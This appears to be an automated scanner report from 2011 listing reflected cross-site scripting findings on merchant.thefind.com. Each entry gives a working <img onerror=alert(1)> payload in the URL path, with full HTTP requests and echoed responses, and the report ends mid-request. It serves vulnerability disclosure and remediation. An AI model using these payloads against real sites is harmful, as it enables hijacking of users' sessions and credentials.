XSS, Cross Site Scripting, CWE-79, CAPEC-86, merchant.thefind.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. https://merchant.thefind.com/css/cobrands/base.css [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/cobrands/base.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18f99<img%20src%3da%20onerror%3dalert(1)>23477999ce8 was submitted in the REST URL parameter 1. This input was echoed as 18f99<img src=a onerror=alert(1)>23477999ce8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css18f99<img%20src%3da%20onerror%3dalert(1)>23477999ce8/cobrands/base.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:40 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 89
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: css18f99<img src=a onerror=alert(1)>23477999ce8.cobrands.base]

1.2. https://merchant.thefind.com/css/cobrands/base.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/cobrands/base.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e1a76<img%20src%3da%20onerror%3dalert(1)>cd6d2484af7 was submitted in the REST URL parameter 2. This input was echoed as e1a76<img src=a onerror=alert(1)>cd6d2484af7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/cobrandse1a76<img%20src%3da%20onerror%3dalert(1)>cd6d2484af7/base.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:09 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 89
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: css.cobrandse1a76<img src=a onerror=alert(1)>cd6d2484af7.base]

1.3. https://merchant.thefind.com/css/cobrands/base.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/cobrands/base.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3c5ba<img%20src%3da%20onerror%3dalert(1)>9af0f50b94 was submitted in the REST URL parameter 3. This input was echoed as 3c5ba<img src=a onerror=alert(1)>9af0f50b94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/cobrands/3c5ba<img%20src%3da%20onerror%3dalert(1)>9af0f50b94 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:57:59 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9549

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.cobrands.3c5ba<img src=a onerror=alert(1)>9af0f50b94]
</div>
...[SNIP]...

1.4. https://merchant.thefind.com/css/mc/calendar.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/calendar.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e511a<img%20src%3da%20onerror%3dalert(1)>02edf370a16 was submitted in the REST URL parameter 1. This input was echoed as e511a<img src=a onerror=alert(1)>02edf370a16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /csse511a<img%20src%3da%20onerror%3dalert(1)>02edf370a16/mc/calendar.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 87
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: csse511a<img src=a onerror=alert(1)>02edf370a16.mc.calendar]

1.5. https://merchant.thefind.com/css/mc/calendar.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/calendar.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2cca7<img%20src%3da%20onerror%3dalert(1)>6b260fbdaa7 was submitted in the REST URL parameter 2. This input was echoed as 2cca7<img src=a onerror=alert(1)>6b260fbdaa7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc2cca7<img%20src%3da%20onerror%3dalert(1)>6b260fbdaa7/calendar.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

1.6. https://merchant.thefind.com/css/mc/calendar.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/calendar.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bacf3<img%20src%3da%20onerror%3dalert(1)>b83ab96f80a was submitted in the REST URL parameter 3. This input was echoed as bacf3<img src=a onerror=alert(1)>b83ab96f80a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc/bacf3<img%20src%3da%20onerror%3dalert(1)>b83ab96f80a HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:01 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9544

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.mc.bacf3<img src=a onerror=alert(1)>b83ab96f80a]
</div>
...[SNIP]...

1.7. https://merchant.thefind.com/css/mc/callout.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/callout.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d711<img%20src%3da%20onerror%3dalert(1)>0c6edd995a5 was submitted in the REST URL parameter 1. This input was echoed as 3d711<img src=a onerror=alert(1)>0c6edd995a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css3d711<img%20src%3da%20onerror%3dalert(1)>0c6edd995a5/mc/callout.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 86
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: css3d711<img src=a onerror=alert(1)>0c6edd995a5.mc.callout]

1.8. https://merchant.thefind.com/css/mc/callout.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/callout.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a441<img%20src%3da%20onerror%3dalert(1)>03dc73eb2fa was submitted in the REST URL parameter 2. This input was echoed as 8a441<img src=a onerror=alert(1)>03dc73eb2fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc8a441<img%20src%3da%20onerror%3dalert(1)>03dc73eb2fa/callout.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

1.9. https://merchant.thefind.com/css/mc/callout.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/callout.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 573ef<img%20src%3da%20onerror%3dalert(1)>56862b83c41 was submitted in the REST URL parameter 3. This input was echoed as 573ef<img src=a onerror=alert(1)>56862b83c41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc/573ef<img%20src%3da%20onerror%3dalert(1)>56862b83c41 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:00 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9544

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.mc.573ef<img src=a onerror=alert(1)>56862b83c41]
</div>
...[SNIP]...

1.10. https://merchant.thefind.com/css/mc/claim_store.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/claim_store.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8aea<img%20src%3da%20onerror%3dalert(1)>ed9f6513af0 was submitted in the REST URL parameter 1. This input was echoed as f8aea<img src=a onerror=alert(1)>ed9f6513af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cssf8aea<img%20src%3da%20onerror%3dalert(1)>ed9f6513af0/mc/claim_store.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:56:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

[Could not find component: cssf8aea<img src=a onerror=alert(1)>ed9f6513af0.mc.claim_store]

1.11. https://merchant.thefind.com/css/mc/claim_store.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/claim_store.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 16147<img%20src%3da%20onerror%3dalert(1)>ebbf742a0ee was submitted in the REST URL parameter 2. This input was echoed as 16147<img src=a onerror=alert(1)>ebbf742a0ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc16147<img%20src%3da%20onerror%3dalert(1)>ebbf742a0ee/claim_store.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

1.12. https://merchant.thefind.com/css/mc/claim_store.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/claim_store.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d16b7<img%20src%3da%20onerror%3dalert(1)>a8d693f3349 was submitted in the REST URL parameter 3. This input was echoed as d16b7<img src=a onerror=alert(1)>a8d693f3349 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /css/mc/d16b7<img%20src%3da%20onerror%3dalert(1)>a8d693f3349 HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-486391256-1299459383931; __utmz=1.1299459384.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.897036025.1299459384.1299459384.1299459384.1; flsid=6997ae4312fc772848dc3a226943369b; fl-uid=bfa3e7209f5ea363cbb5a800fe6fe291%2C1%2C1299583012

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 11:58:02 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
X-Powered-By: PHP/5.2.0-8+etch15
Expires: Tue, 23 Feb 1999 18:30:00 GMT
Cache-Control: must-revalidate, no-cache, no-store, private, s-maxage=0, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 03 Mar 2011 05:12:24 GMT
Content-Language: en
Vary: User-Agent,Accept-Encoding
Status: 200 OK
X-Content-Encoded-By: class.Conteg.0.13
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9544

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:elation="http://www.ajaxelation.com/xmlns">
<head>
<title>Merchant Center-TheFind.com - Shopping Search Reinvented - What can we find
...[SNIP]...
<div id="tf_container">
[Could not find component: css.mc.d16b7<img src=a onerror=alert(1)>a8d693f3349]
</div>
...[SNIP]...

1.13. https://merchant.thefind.com/css/mc/common.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://merchant.thefind.com
Path:	/css/mc/common.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2620<img%20src%3da%20onerror%3dalert(1)>2d3f854f0fa was submitted in the REST URL parameter 1. This input was echoed as d2620<img src=a onerror=alert(1)>2d3f854f0fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cssd2620<img%20src%3da%20onerror%3dalert(1)>2d3f854f0fa/mc/common.css HTTP/1.1
Host: merchant.thefind.com
Connection: keep-alive
Referer: https://merchant.thefind.com/mc/b043a%3Cimg%20src%3da%20onerror%3dalert(1)%3Eab31362be6f
Accept: text/css,*/*;q=0.1
